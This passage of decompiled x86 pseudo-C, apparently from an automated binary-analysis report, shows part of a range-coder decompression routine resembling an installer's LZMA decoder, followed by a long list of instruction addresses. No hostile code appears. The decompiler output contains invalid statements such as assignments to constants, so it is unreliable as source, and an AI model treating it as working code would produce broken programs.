                                                											L149:
                                                											__eflags =  *(__ebp - 0x48);
                                                											if( *(__ebp - 0x48) <= 0) {
                                                												__ecx =  *(__ebp - 0x40);
                                                												__ebx =  *(__ebp - 0x50);
                                                												0 = 1;
                                                												__eax = 1 << __cl;
                                                												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                												__eax =  *(__ebp - 0x7c);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												while(1) {
                                                													 *(_t613 - 0x88) = _t533;
                                                													goto L1;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x50);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                											__eax =  *(__ebp - 0x58);
                                                											__esi = __edx + __eax;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__ax =  *__esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												__cx = __ax >> 5;
                                                												__eax = __eax - __ecx;
                                                												__edx = __edx + 1;
                                                												__eflags = __edx;
                                                												 *__esi = __ax;
                                                												 *(__ebp - 0x50) = __edx;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L148;
                                                											} else {
                                                												goto L146;
                                                											}
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L119:
                                                												_t393 = __ebp - 0x2c;
                                                												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t393;
                                                												L120:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t400 = __ebp - 0x60;
                                                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t400;
                                                												goto L123;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L102:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L108:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L112:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t391 = __ebp - 0x2c;
                                                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t391;
                                                														goto L119;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L111:
                                                														_t368 = __ebp - 0x48;
                                                														 *_t368 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t368;
                                                														goto L112;
                                                													} else {
                                                														goto L109;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L101:
                                                													_t338 = __ebp - 0x48;
                                                													 *_t338 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t338;
                                                													goto L102;
                                                												} else {
                                                													goto L99;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L108;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L79;
                                                										case 0x1b:
                                                											L75:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t274 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t274;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t283 = __ebp - 0x64;
                                                											 *_t283 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t283;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L79:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L80;
                                                										case 0x1c:
                                                											while(1) {
                                                												L123:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t414 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t414;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t414;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L80:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											goto L170;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}













                                                0x00000000
                                                0x00406be3
                                                0x00406be3
                                                0x00406be7
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406f46
                                                0x00406f46
                                                0x00406f49
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00407160
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00407178
                                                0x0040717c
                                                0x0040717c
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00406fbc
                                                0x00406fbc
                                                0x00406fc2
                                                0x00406fc2
                                                0x0040675e
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00406f46
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00406943
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00406fc2
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406fc8
                                                0x00406fc2
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
